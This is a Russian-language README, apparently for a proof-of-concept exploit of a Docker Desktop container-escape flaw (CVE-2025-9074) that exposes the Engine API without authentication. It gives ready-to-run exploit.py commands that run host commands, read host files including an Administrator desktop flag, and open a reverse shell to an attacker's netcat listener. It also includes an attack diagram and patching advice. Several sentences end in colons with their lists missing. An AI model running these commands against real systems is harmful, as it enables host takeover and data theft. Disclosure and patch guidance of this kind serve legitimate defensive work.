
Эксплоит Proof of Concept для CVE-2025-9074 - неаутентифицированный побег из контейнера Docker Engine API, затрагивающий Docker Desktop < 4.44.3 на Windows и macOS (CVSS 9.3)
Эксплойт Proof of Concept для CVE-2025-9074 — критическая уязвимость побега из контейнера в Docker Desktop, позволяющая неавторизованный доступ к API Docker Engine.
| Свойство | Значение |
|---|---|
| CVE ID | CVE-2025-9074 |
| CVSS Score | 9.3 (Критический) |
| Уязвимое ПО | Docker Desktop < 4.44.3 |
| Затронутые платформы | Windows, macOS (Linux не затронут) |
| Исправленная версия | Docker Desktop 4.44.3+ |
| Обнаружили | Felix Boulet, Philippe Dugré |
| Дата обнаружения | Середина 2025 |
| Дата исправления | 20 августа 2025 |
Уязвимость позволяет контейнерам, работающим в Docker Desktop, получать доступ к API Docker Engine по адресу http://192.168.65.7:2375 без аутентификации. Это происходит независимо от:
API Docker Engine был открыт на TCP-сокете, доступном из контейнеров, что позволяло:
pip3 install requests
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Set up listener
nc -lvnp 4444
# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Once connected, host filesystem is at: /hostfs
# If you already have access to a container
curl http://192.168.65.7:2375/version
graph TD
A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Create Container| C[Privileged Container]
C -->|Mount Host FS| D[Full Host Access]
D -->|Read/Write| E[Compromise System]
Немедленно обновитесь до Docker Desktop 4.44.3 или новее.
# Check your Docker Desktop version
docker --version
# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg
Если немедленное обновление невозможно:
Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности.
Лицензия MIT — подробности в файле LICENSE